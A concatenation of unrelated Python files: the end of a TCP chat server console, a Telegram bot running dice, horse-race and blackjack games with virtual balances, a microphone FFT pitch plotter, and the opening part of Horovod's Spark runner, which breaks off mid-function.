connDict["conn" + str(connectionCounter)] = connectedClient(connection, address, connectionCounter)
connectionCounter += 1
def shutdown(args):
global server_socket
if len(args) == 0:
print("Closing all connections")
for connection in connDict:
if connDict[connection].isonline is True:
connDict[connection].closeConnectionByServer("Server Closed")
elif len(args) == 1:
print("Closing all connections")
for connection in connDict:
if connDict[connection].isonline is True:
connDict[connection].closeConnectionByServer(args[0])
else:
print("exit: Requires max. 1 argument")
return
print("Closing server socket")
server_socket.close()
print("Stopping")
exit(0)
def ls(args):
if len(args) == 0:
if len(connDict) == 0:
print("ls: There are no connections")
return
for connection in connDict:
print(connection + ": " + str(connDict[connection]))
elif len(args) == 1:
try:
print("ID: " + str(connDict[args[0]].id))
print("IP-Address: " + str(connDict[args[0]].ip))
print("Port: " + str(connDict[args[0]].port))
print("Username: " + str(connDict[args[0]].username))
print("Is Online: " + str(connDict[args[0]].isonline))
except KeyError:
print("ls: Connection \'" + args[0] + "\' doesn't exist")
else:
print("ls: Requires max. 1 argument")
def changeDebug(args):
global debug
if len(args) == 1:
if args[0] == "on":
if debug is True:
print("Debug is already on")
else:
print("Turned debug on")
debug = True
elif args[0] == "off":
if debug is False:
print("Debug is already off")
else:
print("Turned debug off")
debug = False
elif args[0] == "status":
if debug is True:
print("Debug is currently turned on")
else:
print("Debug is currently turned off")
else:
print("debug: Unknown argument \'" + args[0] + "\'")
else:
print("debug: Requires exactly 1 argument")
def kick(args):
if len(args) == 0:
print("kick: Requires min. 1 argument")
elif len(args) == 1 or len(args) == 2:
if args[0] in connDict:
if connDict[args[0]].isonline is True:
if len(args) == 2:
connDict[args[0]].closeConnectionByServer(args[1])
else:
connDict[args[0]].closeConnectionByServer()
else:
print("kick: Connection \'" + args[0] + "\' is already offline")
else:
print("kick: Connection \'" + args[0] + "\' doesn't exist")
else:
print("kick: Requires max. 2 arguments")
# starting thread for accept connections
acceptConnectionsThread = threading.Thread(target=acceptConnections)
acceptConnectionsThread.daemon = True
acceptConnectionsThread.start()
def main():
print("Welcome to TCPChat2 server console!")
while True:
print()
command = str(input("$ "))
command = cliInterpretor(command)
if len(command) == 0:
print("Command not found")
continue
if command[0] == "exit":
shutdown(command[1:])
elif command[0] == "ls":
ls(command[1:])
elif command[0] == "debug":
changeDebug(command[1:])
elif command[0] == "clear" or command[0] == "cls":
os.system("clear")
elif command[0] == "kick":
kick(command[1:])
else:
print("Command not found")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print()
shutdown([])
except EOFError:
print()
shutdown([])
|
main.py
|
from config import BOTNAME,BOTTOKEN,DEBUG,PROXY,PY
from api import GetUserInfo,ChangeUserInfo
import requests
reqChange=requests.Session()
reqSender=requests.Session()
reqUpdater=requests.Session()
reqCallback=requests.Session()
req=requests.Session()
if len(PROXY)>0:
reqChange.proxies={"http":PROXY,"https":PROXY}
reqSender.proxies={"http":PROXY,"https":PROXY}
reqUpdater.proxies={"http":PROXY,"https":PROXY}
reqCallback.proxies={"http":PROXY,"https":PROXY}
req.proxies={"http":PROXY,"https":PROXY}
import time
import threading
import json
import re
if DEBUG:
import sys
import traceback
HELPMESSAGE='''帮助
/help 帮助
/blackjack 21点
/horse 赛马
/dice 骰子
/bet 金额|百分比|sh 下注(不支持小数)
例: /bet 10 或 /bet 10%
'''
def MakeRequest(method,data="",robj=req):
if DEBUG:
print("Make:"+method)
if data=="":
r=robj.get("https://api.telegram.org/bot"+BOTTOKEN+"/"+method)
else:
r=robj.post("https://api.telegram.org/bot"+BOTTOKEN+"/"+method,data=data)
resans=json.loads(r.text)
if resans["ok"]!=True:
logger.error(r.text)
if DEBUG:
print("Fin:"+r.text)
return resans
import logging
logging.basicConfig(level = logging.ERROR,format = '[%(asctime)s][%(levelname)s]: %(message)s')
#logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
# Telegram Bot
ChangeQueue=[]
ChangeLock=threading.Lock()
def ServiceChange():
global ChangeQueue
try:
f=open("BotUpdateID")
LastID=int(f.read())
f.close()
except:
LastID=0
while True:
try:
res=MakeRequest("getUpdates",{"offset":str(LastID+1),"allowed_updates":"[\"message\",\"callback_query\"]","timeout":10},robj=reqChange)
if DEBUG:
print("MKREQ ",res)
if res["ok"]==True:
#print(res)
lis=res["result"]
ChangeLock.acquire()
ChangeQueue=ChangeQueue+lis
ChangeLock.release()
if len(lis)>0:
LastID=lis[-1]["update_id"]
f=open("BotUpdateID","w")
f.write(str(LastID))
f.close()
except:
logger.error("Change")
ThErr()
time.sleep(0.2)
SenderQueue=[]
SenderLock=threading.Lock()
SendReqIDMap={}
SendReqIDTot=-1
def ServiceSender():#TODO: rate limit
global SenderQueue,SendReqIDMap
while True:
try:
sttime=time.time()
SenderLock.acquire()
todolis=SenderQueue*1
SenderQueue.clear()
SenderLock.release()
for it in todolis:
resarr={"text":it["text"],"chat_id":it["chat_id"]}
if "reply_markup" in it:
resarr["reply_markup"]=json.dumps(it["reply_markup"])
if "reply_to_message_id" in it:
resarr["reply_to_message_id"]=it["reply_to_message_id"]
#print(resarr)
ret=MakeRequest("sendMessage",resarr,robj=reqSender)
if "reqid" in it:
SendReqIDMap[it["reqid"]]=ret["result"]["message_id"]
if DEBUG:
print("SEND ",resarr)
edtime=time.time()
net=max(0.1-edtime+sttime,0)
time.sleep(net)
except:
logger.error("Sender")
ThErr()
time.sleep(0.1)
UpdaterQueue=[]
UpdaterLock=threading.Lock()
def ServiceUpdater():#TODO: merge & rate limit
global UpdaterQueue
while True:
try:
sttime=time.time()
UpdaterLock.acquire()
todolis=UpdaterQueue*1
UpdaterQueue.clear()
UpdaterLock.release()
for it in todolis:
resarr={"text":it["text"],"chat_id":it["chat_id"],"message_id":it["message_id"]}
if "reply_markup" in it:
resarr["reply_markup"]=json.dumps(it["reply_markup"])
MakeRequest("editMessageText",resarr,robj=reqUpdater)
edtime=time.time()
net=max(0.1-edtime+sttime,0)
time.sleep(net)
except:
logger.error("Updater")
ThErr()
time.sleep(0.1)
CallbackQueue=[]
CallbackLock=threading.Lock()
def ServiceCallback():#TODO: merge
global CallbackQueue
while True:
try:
sttime=time.time()
CallbackLock.acquire()
todolis=CallbackQueue*1
CallbackQueue.clear()
CallbackLock.release()
for it in todolis:
resarr={"callback_query_id":it["id"]}
if "text" in it:
resarr["text"]=it["text"]
if "alert" in it:
resarr["show_alert"]=it["alert"]
MakeRequest("answerCallbackQuery",resarr,robj=reqUpdater)
edtime=time.time()
net=max(0.1-edtime+sttime,0)
time.sleep(net)
except:
logger.error("Callback")
ThErr()
time.sleep(0.1)
def GetChange():
global ChangeQueue
ChangeLock.acquire()
ret=ChangeQueue*1
ChangeQueue.clear()
ChangeLock.release()
return ret
def SendMessage(text,chatid,reply=0,button={},reqid=0):
global SenderQueue
obj={"text":text,"chat_id":chatid}
if len(button)!=0:
obj["reply_markup"]=button
if reply!=0:
obj["reply_to_message_id"]=reply
if reqid!=0:
obj["reqid"]=reqid
SenderLock.acquire()
SenderQueue.append(obj)
SenderLock.release()
def UpdateMessage(text,chatid,messid,button={}):
global UpdaterQueue
obj={"text":text,"chat_id":chatid,"message_id":messid}
if len(button)!=0:
obj["reply_markup"]=button
UpdaterLock.acquire()
flag=False
for i in UpdaterQueue:
if i["chat_id"]==chatid and i["message_id"]==messid:
flag=True
i["text"]=text
if len(button)!=0:
i["reply_markup"]=button
elif "reply_markup" in i:
i.pop("reply_markup")
flag=True
if not flag:
UpdaterQueue.append(obj)
UpdaterLock.release()
def AnswerCallback(callbackid,text="",isalert=False):
global CallbackQueue
obj={"id":callbackid}
if len(text)!=0:
obj["text"]=text
if isalert:
obj["alert"]=True
CallbackLock.acquire()
CallbackQueue.append(obj)
CallbackLock.release()
ObjThreadServiceChange=threading.Thread(target=ServiceChange)
ObjThreadServiceChange.start()
ObjThreadServiceSender=threading.Thread(target=ServiceSender)
ObjThreadServiceSender.start()
ObjThreadServiceUpdater=threading.Thread(target=ServiceUpdater)
ObjThreadServiceUpdater.start()
ObjThreadServiceCallback=threading.Thread(target=ServiceCallback)
ObjThreadServiceCallback.start()
# Bot end
# Game Obj
class GameDiceObj(object):
def __init__(self,userlist):
self.player=userlist
self.playerst={}
for i in userlist:
self.playerst[i]=0#0:pending 1:xiao 2:da 3:wei
self.NeedUpdate=True
self.NeedEnd=False
self.lastime=time.time()
def GenMess(self):
info=["?","小","大","围"]
mess="骰子"
for i in self.player:
mess+="\n"+self.player[i]["name"]+"("+str(self.player[i]["money"])+"): "+info[self.playerst[i]]
return mess
def GenButton(self,chatid):
return [[{"text":"小","callback_data":str(chatid)+"+s"},
{"text":"围","callback_data":str(chatid)+"+m"},
{"text":"大","callback_data":str(chatid)+"+l"}
],
[{"text":"强制结束","callback_data":str(chatid)+"+E"}]]
def UserCmd(self,uid,action):
if action=="E":
if time.time()-self.lastime>15:
self.NeedEnd=True
return
if self.NeedEnd:
return
if not uid in self.player:
return
if self.playerst[uid]!=0:
return
self.NeedUpdate=True
if action=="s":
self.playerst[uid]=1
elif action=="l":
self.playerst[uid]=2
else:
self.playerst[uid]=3
self.lastime=time.time()
return
def NextTick(self):
sfg=True
for i in self.playerst:
if self.playerst[i]==0:
sfg=False
self.NeedEnd|=sfg
def EndGame(self):
info=["?","小","大","围"]
res=[]
rdl=__import__("random")
res.append(rdl.randint(1,6))
res.append(rdl.randint(1,6))
res.append(rdl.randint(1,6))
typ=1
if res[0]==res[1] and res[1]==res[2]:
typ=3
elif sum(res)>=11:
typ=2
mess="骰子"
mess+="\n🎲"+str(res[0])+" 🎲"+str(res[1])+" 🎲"+str(res[2])
user={}
for i in self.player:
ob={"mess":info[self.playerst[i]]}
if self.playerst[i]==0:
ob["money"]=self.player[i]["money"]
elif self.playerst[i]==typ:
ob["money"]=self.player[i]["money"]*2
if typ==3:
ob["money"]=self.player[i]["money"]*24
else:
ob["money"]=0
user[i]=ob
return (mess,user)
class GameHorseObj(object):
def __init__(self,userlist):
self.player=userlist
self.playerst={}
self.horsest={}#(dis,st)
for i in userlist:
self.playerst[i]=0#ma id
self.NeedUpdate=True
self.NeedEnd=False
self.lastime=time.time()
self.status=0#0xuanma 1jiesuan
self.NeedStart=False
self.rdlib=__import__("random").SystemRandom()
self.sm={}
def GenMess(self):
info="?------"
if self.status==0:
mess="选马"
for i in self.player:
mess+="\n"+self.player[i]["name"]+"("+str(self.player[i]["money"])+"): 🐴"+info[self.playerst[i]]
return mess
else:
mst=["🏇","☠️","🐎"]
mess="赛马"
for i in self.horsest:
tx=" "*max(50-self.horsest[i][0],0)
tx+=mst[self.horsest[i][1]]
tx+=str(i)
mess+="\n"+tx
return mess
def GenButton(self,chatid):
if self.status==0:
return [[{"text":"🐴1","callback_data":str(chatid)+"+1"},
{"text":"🐴2","callback_data":str(chatid)+"+2"},
{"text":"🐴3","callback_data":str(chatid)+"+3"}
],
[{"text":"🐴4","callback_data":str(chatid)+"+4"},
{"text":"🐴5","callback_data":str(chatid)+"+5"},
{"text":"🐴6","callback_data":str(chatid)+"+6"}
],
[{"text":"强制开始","callback_data":str(chatid)+"+E"}]]
else:
return [[{"text":"火箭加速","callback_data":str(chatid)+"+H"},
{"text":"快马加鞭","callback_data":str(chatid)+"+B"}
]]
def UserCmd(self,uid,action):
mst="马死摔"
if action=="E":
if time.time()-self.lastime>15:
self.NeedStart=True
return
if not uid in self.player:
return
if self.status==0:
if self.playerst[uid]!=0:
return
if not re.match("^[1-6]$",action):
return
self.NeedUpdate=True
self.playerst[uid]=int(action)
self.lastime=time.time()
fafa=True
for i in self.playerst:
if self.playerst[i]==0:
fafa=False
self.NeedStart|=fafa
else:
maid=self.playerst[uid]
if maid==0:
return
if self.horsest[maid][1]!=0:
return ("你🐴"+mst[self.horsest[maid][1]]+"了",True)
if action=='H':
dis=min(50,16+self.horsest[maid][0])
ff=self.rdlib.randint(0,1)
gst=0
if ff==1:
gst=1
self.horsest[maid]=(dis,gst)
if action=='B':
dis=min(50,8+self.horsest[maid][0])
ff=self.rdlib.randint(0,2)
gst=0
if ff==2:
gst=2
self.horsest[maid]=(dis,gst)
return
return
def NextTick(self):
if self.status==0:
if self.NeedStart==False:
return
for i in range(1,7):
self.horsest[i]=(0,0)
self.sm[i]=0
self.status=1
return
else:
self.NeedUpdate=True
for i in self.horsest:
if self.horsest[i][1]==0:
dis=self.rdlib.randint(3,6)
dis=min(50,dis+self.horsest[i][0])
self.horsest[i]=(dis,self.horsest[i][1])
self.sm[i]=0
if dis==50:
self.NeedEnd=True
elif self.horsest[i][1]==2:
self.sm[i]+=1
if self.sm[i]==5:
self.horsest[i]=(self.horsest[i][0],0)
return
def EndGame(self):
mess="赛马"
mst=["🏇","☠️","🐎"]
info="?123456"
for i in self.horsest:
tx=" "*max(50-self.horsest[i][0],0)
tx+=mst[self.horsest[i][1]]
tx+=str(i)
mess+="\n"+tx
user={}
for i in self.player:
ob={"mess":"🐴"+info[self.playerst[i]]}
if self.playerst[i]==0:
ob["money"]=self.player[i]["money"]
elif self.horsest[self.playerst[i]][0]==50 and self.horsest[self.playerst[i]][1]==0:
ob["money"]=self.player[i]["money"]*2
else:
ob["money"]=0
user[i]=ob
return (mess,user)
class GameBlackJackObj(object):
def __init__(self,userlist):
self.vall=[0,1,2,3,4,5,6,7,8,9,10,10,10,10]
self.Redst=["x","A","2","3","4","5","6","7","8","9","10","J","Q","K"]
self.player=userlist
self.playerst={}
self.playerok={}
self.NeedUpdate=True
self.NeedEnd=False
self.lastime=time.time()
self.rdlib=__import__("random").SystemRandom()
self.zjst=[self.rdlib.randint(1,13),self.rdlib.randint(1,13)]
while self.cal(self.zjst)[1]<17:
self.zjst.append(self.rdlib.randint(1,13))
for i in userlist:
self.playerst[i]=[self.rdlib.randint(1,13),self.rdlib.randint(1,13)]
self.playerok[i]=0
if self.cal(self.playerst[i])[1]==21:
self.playerok[i]=2
def cal(self,arr):
ret=[0,0]
for i in arr:
ret[1]+=self.vall[i]
if i==1:
ret[0]+=1
if ret[1]<=11 and ret[0]>0:
ret[1]+=10
return tuple(ret)
def arr2str(self,arr):
st=""
for i in arr:
st+=self.Redst[i]+" "
return st
def GenMess(self):
mess="21点"
sta=["未完成","已完成","黑杰克","爆炸"]
mess+="\n庄家: "+self.Redst[self.zjst[0]]+" ?"
for i in self.player:
mess+="\n"+self.player[i]["name"]+"("+str(self.player[i]["money"])+"): "+self.arr2str(self.playerst[i])+sta[self.playerok[i]]
return mess
def GenButton(self,chatid):
return [[{"text":"要牌","callback_data":str(chatid)+"+Y"},
{"text":"完成","callback_data":str(chatid)+"+N"}
],
[{"text":"强制结束","callback_data":str(chatid)+"+E"}]]
def UserCmd(self,uid,action):
if action=="E":
if time.time()-self.lastime>15:
self.NeedEnd=True
return
if self.NeedEnd:
return
if not uid in self.player:
return
if self.playerok[uid]!=0:
return
if action=='Y':
self.playerst[uid].append(self.rdlib.randint(1,13))
cc=self.cal(self.playerst[uid])
if cc[1]>21:
self.playerok[uid]=3
if action=='N':
self.playerok[uid]=1
self.NeedUpdate=True
self.lastime=time.time()
return
def NextTick(self):
nmsl=True
for i in self.playerok:
if self.playerok[i]==0:
nmsl=False
self.NeedEnd|=nmsl
return
def EndGame(self):
mess="21点"
sta=["失败","胜利","黑杰克","爆炸","平局"]
mess+="\n庄家: "+self.arr2str(self.zjst)
user={}
zjd=self.cal(self.zjst)
for i in self.player:
ob={"mess":self.arr2str(self.playerst[i])}
nmsl=self.playerok[i]
if self.playerok[i]==3:
ob["money"]=0
elif self.playerok[i]==2:
ob["money"]=int(self.player[i]["money"]*2.5)
else:
if zjd[1]>21 or self.cal(self.playerst[i])[1]>zjd[1]:
ob["money"]=self.player[i]["money"]*2
nmsl=1
elif self.cal(self.playerst[i])[1]==zjd[1]:
ob["money"]=self.player[i]["money"]
nmsl=4
else:
ob["money"]=0
nmsl=0
ob["mess"]+=sta[nmsl]
user[i]=ob
return (mess,user)
GameObjList={
"dice":{"cmd":"/dice","obj":GameDiceObj,"name":"骰子"},
"horse":{"cmd":"/horse","obj":GameHorseObj,"name":"赛马"},
"blackjack":{"cmd":"/blackjack","obj":GameBlackJackObj,"name":"21点"}
}
Cmd2Game={}
for i in GameObjList:
Cmd2Game[GameObjList[i]["cmd"]]=i
# Game end
def GenBetButton(chatid):
return [[{"text":"5","callback_data":str(chatid)+"+*X5"},
{"text":"10","callback_data":str(chatid)+"+*X10"},
{"text":"50","callback_data":str(chatid)+"+*X50"},
{"text":"50%","callback_data":str(chatid)+"+*X50%"},
{"text":"sh","callback_data":str(chatid)+"+*Xsh"}
],
[{"text":"Start","callback_data":str(chatid)+"+*S"},{"text":"余额","callback_data":str(chatid)+"+*M"}]]
AliveGame={}
def DoBet(userobj,chatid,st):
uid=userobj["id"]
global AliveGame,UserInfo,SendReqIDMap
if st=="sh":
st=str(GetUserInfo(uid))
if re.match("(^[1-9][0-9]{0,1}%$|^100%$)",st):
fa=int(int(st[:-1])/100.0*GetUserInfo(uid))
st=str(fa)
if not re.match("^[1-9][0-9]*$",st):
return (-1,"无法识别投注金额")
if not chatid in AliveGame:
return (-1,"无进行中游戏")
if not AliveGame[chatid]["status"]==0:
return (-1,"游戏状态错误")
mon=int(st)
if mon>GetUserInfo(uid):
return (-1,"余额不足")
ChangeUserInfo(uid,-mon)
if not uid in AliveGame[chatid]["player"]:
AliveGame[chatid]["player"][uid]={"money":0,"name":userobj["first_name"]}
AliveGame[chatid]["player"][uid]["money"]+=mon
if AliveGame[chatid]["messid"]<0:
sbsb=AliveGame[chatid]["messid"]
if not sbsb in SendReqIDMap:
return (-1,"消息未发出")
AliveGame[chatid]["messid"]=SendReqIDMap[AliveGame[chatid]["messid"]]
SendReqIDMap.pop(sbsb)
typ=AliveGame[chatid]["typ"]
mess=GameObjList[typ]["name"]+"\n玩家"
for i in AliveGame[chatid]["player"]:
mess+="\n"+AliveGame[chatid]["player"][i]["name"]+": "+str(AliveGame[chatid]["player"][i]["money"])+"("+str(GetUserInfo(i))+")"
UpdateMessage(mess,chatid,AliveGame[chatid]["messid"],button={"inline_keyboard":GenBetButton(chatid)})
return (0,"下注成功")
def StartGame(chatid,typ):
global AliveGame,SendReqIDTot
if chatid in AliveGame:
if AliveGame[chatid]["messid"]<0:
sbsb=AliveGame[chatid]["messid"]
if sbsb in SendReqIDMap:
AliveGame[chatid]["messid"]=SendReqIDMap[AliveGame[chatid]["messid"]]
SendReqIDMap.pop(sbsb)
SendMessage("上一局游戏还未结束 无法新建",chatid,reply=AliveGame[chatid]["messid"])
return
obj={"typ":typ,"player":{},"status":0,"messid":SendReqIDTot}
AliveGame[chatid]=obj
SendMessage(GameObjList[typ]["name"],chatid,button={"inline_keyboard":GenBetButton(chatid)},reqid=SendReqIDTot)
SendReqIDTot-=1
return
def EndGame(chatid):
global AliveGame
(mess,chang)=AliveGame[chatid]["game"].EndGame()
AliveGame[chatid]["game"].NeedUpdate=False
#player
for i in chang:
ChangeUserInfo(i,chang[i]["money"])
usm=GetUserInfo(i)
mess+="\n"+AliveGame[chatid]["player"][i]["name"]+"("+str(AliveGame[chatid]["player"][i]["money"])+"): "+chang[i]["mess"]+" +"+str(chang[i]["money"])+"("+str(usm)+")"
UpdateMessage(mess,chatid,AliveGame[chatid]["messid"])
return
def UpdateGame(chatid):
AliveGame[chatid]["game"].NeedUpdate=False
mess=AliveGame[chatid]["game"].GenMess()
but={"inline_keyboard":AliveGame[chatid]["game"].GenButton(chatid)}
UpdateMessage(mess,chatid,AliveGame[chatid]["messid"],button=but)
return
def DoCommand(obj):
if not "text" in obj:
return
txt=obj["text"]
if len(txt)<1 or txt[0]!='/':
return
cmdall=txt.split(' ')
cmd=cmdall[0]
if cmd.find("@")!=-1:
botname=cmd[cmd.find("@"):]
if botname!="@"+BOTNAME:
return
cmd=cmd.replace("@"+BOTNAME,"")
if cmd=="/help" or cmd=="/start":
SendMessage(HELPMESSAGE,obj["chat"]["id"])
if cmd in Cmd2Game:
StartGame(obj["chat"]["id"],Cmd2Game[cmd])
if cmd=="/bet":
if len(cmdall)>1:
res=DoBet(obj["from"],obj["chat"]["id"],cmdall[1])
if res[0]==0:
retx="成功 "
else:
retx="错误 "
retx+=res[1]
SendMessage(retx,obj["chat"]["id"],reply=obj["message_id"])
if cmd=='/del':
global AliveGame
if obj["chat"]["id"] in AliveGame:
AliveGame.pop(obj["chat"]["id"])
SendMessage("已重置",obj["chat"]["id"])
if PY:
if cmd=='/py':
mm=__import__("random").randint(-100,1000)
GetUserInfo(obj["from"]["id"])
ChangeUserInfo(obj["from"]["id"],mm)
SendMessage("pyed: "+str(mm),obj["chat"]["id"],reply=obj["message_id"])
return
def DoButton(obj):
global AliveGame
if (not "data" in obj) or len(obj["data"])<1:
return
dat=obj["data"].split('+')
if len(dat)<2 or (not re.match("^[-]*[1-9][0-9]*$",dat[0])):
AnswerCallback(obj["id"],"非法请求")
return
cid=int(dat[0])
if not cid in AliveGame:
AnswerCallback(obj["id"],"无进行中的游戏")
return
txt=dat[1]
if AliveGame[cid]["status"]==0:
if txt[0]!='*':
return
if txt[1]=='X':
res=DoBet(obj["from"],cid,txt[2:])
sta=False
if res[0]==0:
retx="成功 "
else:
retx="错误 "
sta=True
retx+=res[1]
AnswerCallback(obj["id"],retx,isalert=sta)
elif txt[1]=='M':
AnswerCallback(obj["id"],"余额: "+str(GetUserInfo(obj["from"]["id"])),isalert=True)
elif txt[1]=='S':
if not AliveGame[cid]["player"]:
AnswerCallback(obj["id"],"没人上车")
return
AliveGame[cid]["game"]=GameObjList[AliveGame[cid]["typ"]]["obj"](AliveGame[cid]["player"])
AliveGame[cid]["status"]=1
AnswerCallback(obj["id"])
else:
ret=AliveGame[cid]["game"].UserCmd(obj["from"]["id"],txt)
if ret is None:
AnswerCallback(obj["id"])
else:
AnswerCallback(obj["id"],ret[0],ret[1])
return
def DoChange(cz):
if "message" in cz:
DoCommand(cz["message"])
elif "callback_query" in cz:
DoButton(cz["callback_query"])
return
def ThErr():
if DEBUG:
ex_type, ex_val, ex_stack = sys.exc_info()
print(ex_type)
print(ex_val)
for stack in traceback.extract_tb(ex_stack):
print(stack)
print(ex_type,file=sys.stderr)
print(ex_val,file=sys.stderr)
for stack in traceback.extract_tb(ex_stack):
print(stack,file=sys.stderr)
#main
def main():
while True:
sttime=time.time()
ch=GetChange()
#print(ch)
for cz in ch:
DoChange(cz)
nend=[]
for i in AliveGame:
if "game" in AliveGame[i]:
try:
AliveGame[i]["game"].NextTick()
if AliveGame[i]["game"].NeedEnd:
EndGame(i)
nend.append(i)
if AliveGame[i]["game"].NeedUpdate:
UpdateGame(i)
except:
logger.error("Update Game")
if DEBUG:
ThErr()
for i in nend:
AliveGame.pop(i)
edtime=time.time()
if DEBUG:
print(edtime-sttime)
net=max(2-edtime+sttime,0)
time.sleep(net)
try:
main()
except:
ThErr()
exit(0)
|
main.py
|
import sys
import time
import numpy as np
import random
import matplotlib.pyplot as plt
import queue
import matplotlib.animation as animation
import threading
from scipy.io.wavfile import read as wavread
from scipy.signal import blackmanharris
from pysoundcard import *
from math import log
from sys import float_info
from collections import deque
"""
This function takes a numpy vector that represents the sampled sound from the stream, and processes it.
"""
def get_frequency(in_data, chunk):
# Take the fft and square each value
windowed = in_data[:,0] * blackmanharris(len(in_data))
data_after_fft = np.fft.rfft(windowed)
# Find the peak
i = np.argmax(abs(data_after_fft))
# Convert to equivalent frequency
# TODO: calibrate the frequency so it shows up in Hz ,this is not the right calculation
thefreq= chunk * i / len(windowed)
data_in_decibels = map (lambda x : - 30 if x<sys.float_info.min else 20* log(x) , data_after_fft)
# TODO: a more accurate method would be to use quadratic interpolation around this value to get a better estimate of where the maximum is
# TODO: the code iterates through the chunk again needlessly to find the peak intensity. Improve the algorithm.
peak_intensity = max(data_in_decibels)
return thefreq, peak_intensity
"""
The API for the sound input operates on callbacks. A function like this needs to be provided to the constructor:
def simple_callback(in_data, frame_count, time_info, status):
print(get_frequency(in_data, frame_count, 2048))
return (in_data, continue_flag)
which is then called asynchronously after the chunk of input is received.
"""
def make_callback_that_puts_into_queue(queue):
def callback(in_data, frame_count, time_info, status):
frequency, intensity = get_frequency(in_data, block_length)
queue.put((frequency, intensity))
return (in_data, continue_flag)
return callback
queue_for_the_stream = queue.Queue()
# FFT works best when the block length is a power of two.
block_length = 2048
s = Stream(sample_rate=44100, block_length=block_length,output_device=False, callback=make_callback_that_puts_into_queue(queue_for_the_stream))
s.start()
"""
The input part of the code finishes here. The input gets taken from the stream, transformed and placed into a queue.
We can retrieve the data with the queue.get() operation. The operation works very nicely, because if the queue is empty, it blocks until it can receive an input.
"""
"""
A simple implementation of a display.
We store the incoming data into a buffer. One thread fills the buffer constantly, the other redraws the buffer as fast as it can.
"""
buffer_size = 20
buffer = deque([0]*buffer_size, maxlen=buffer_size)
# let the thread add elements to the queue in a loop.
#TODO: think of a better implementation that doesn't involve a separate thread and time.sleep().
def keepFillingTheBuffer(queue,buffer):
while True:
time.sleep(0.03) # 0.03 is about half the time between successive chunks appearing.
next , threshold = queue.get()
buffer.append(next)
t= threading.Thread(target=keepFillingTheBuffer, args = (queue_for_the_stream, buffer))
t.daemon=True
t.start()
"""
This makes an animation using matplotlib. Shamelessly copypasted and slightly adapted.
"""
fig = plt.figure()
ax = plt.axes(xlim=(0, 20), ylim=(10, 160))
line, = ax.plot([], [], lw=2)
def init():
line.set_data([], [])
return line,
def make_animate( buffer, queue):
def animate(i):
x = np.linspace(0, buffer_size, buffer_size)
y = list(buffer)
line.set_data(x, y)
return line,
return animate
animate = make_animate(buffer, queue_for_the_stream)
# call the animator. blit=True means only re-draw the parts that have changed.
anim = animation.FuncAnimation(fig, animate, init_func=init, blit=True)
plt.show()
#TODO: implement stopping after a keystroke as opposed to ctrl+c.
time.sleep(1000)
s.stop()
"""
I experimented with the callback function that takes an object responsible for plotting.
The problem was that the plotting might be slower than incoming data, so you can't redraw every time you receive a chunk.
class DrawingBuffer:
def __init__(self, bufferSize):
#self.buffer = deque([-30]*bufferSize, maxlen=bufferSize)
self.bufferSize = bufferSize
self.current = 0
plt.axis([0, bufferSize, 0, 200])
plt.ion()
plt.show()
def newFrame(self, frequency, intensity): # for now do nothing with intensity
self.current = (self.current + 1 ) % self.bufferSize
plt.scatter(self.current, frequency)
plt.draw()
def make_callback_that_draws(drawing_object):
def callback(in_data, frame_count, time_info, status):
drawing_object.newFrame(*get_frequency(in_data, frame_count, block_length))
return (in_data, continue_flag)
return callback
"""
|
runner.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import platform
import threading
import pyspark
from six.moves import queue
from horovod.spark.task import task_service
from horovod.spark.gloo_run import gloo_run
from horovod.spark.mpi_run import mpi_run
from horovod.run.runner import run_controller
from horovod.run.common.util import timeout, host_hash, secret
from horovod.run.common.util import settings as hvd_settings
from horovod.spark.driver import driver_service, job_id
# Spark will fail to initialize correctly locally on Mac OS without this
if platform.system() == 'Darwin':
os.environ['OBJC_DISABLE_INITIALIZE_FORK_SAFETY'] = 'YES'
def _task_fn(index, driver_addresses, key, settings, use_gloo):
# deserialized on Spark workers, settings do not contain the key, so it is given here explicitly
# Spark RPC communicates the key and supports encryption
# for convenience, we put it back into settings
settings.key = key
task = task_service.SparkTaskService(index, settings.key, settings.nics, settings.verbose)
try:
driver_client = driver_service.SparkDriverClient(driver_addresses, settings.key, settings.verbose)
driver_client.register_task(index, task.addresses(), host_hash.host_hash())
task.wait_for_initial_registration(settings.timeout)
# Tasks ping each other in a circular fashion to determine interfaces reachable within
# the cluster.
next_task_index = (index + 1) % settings.num_proc
next_task_addresses = driver_client.all_task_addresses(next_task_index)
# We request interface matching to weed out all the NAT'ed interfaces.
next_task_client = \
task_service.SparkTaskClient(next_task_index, next_task_addresses,
settings.key, settings.verbose,
match_intf=True)
driver_client.register_task_to_task_addresses(next_task_index, next_task_client.addresses())
task_indices_on_this_host = driver_client.task_host_hash_indices(
host_hash.host_hash())
# With Gloo all tasks wait for the command
# With MPI task with first index executes orted which will run mpirun_exec_fn for all tasks.
if use_gloo or task_indices_on_this_host[0] == index:
task.wait_for_command_start(settings.timeout)
task.wait_for_command_termination()
else:
# The rest of tasks need to wait for the first task to finish.
first_task_addresses = driver_client.all_task_addresses(task_indices_on_this_host[0])
first_task_client = \
task_service.SparkTaskClient(task_indices_on_this_host[0],
first_task_addresses, settings.key,
settings.verbose)
first_task_client.wait_for_command_termination()
return task.fn_result()
finally:
task.shutdown()
def _make_mapper(driver_addresses, settings, use_gloo):
# serialised settings do not have a key so we have to copy it and provide it explicitly here
key = settings.key
def _mapper(index, _):
yield _task_fn(index, driver_addresses, key, settings, use_gloo)
return _mapper
def _make_spark_thread(spark_context, spark_job_group, driver, result_queue,
settings, use_gloo):
"""Creates `settings.num_proc` Spark tasks in a parallel thread."""
def run_spark():
"""Creates `settings.num_proc` Spark tasks, each executing `_task_fn` and waits for them to terminate."""
try:
spark_context.setJobGroup(spark_job_group,
"Horovod Spark Run",
interruptOnCancel=True)
procs = spark_context.range(0, numSlices=settings.num_proc)
# We assume that folks caring about security will enable Spark RPC encryption,
# thus ensuring that key that is passed here remains secret.
result = procs.mapPartitionsWithIndex(_make_mapper(driver.addresses(), settings, use_gloo)).collect()
result_queue.put(result)
except:
driver.notify_spark_job_failed()
raise
spark_thread = threading.Thread(target=run_spark)
spark_thread.start()
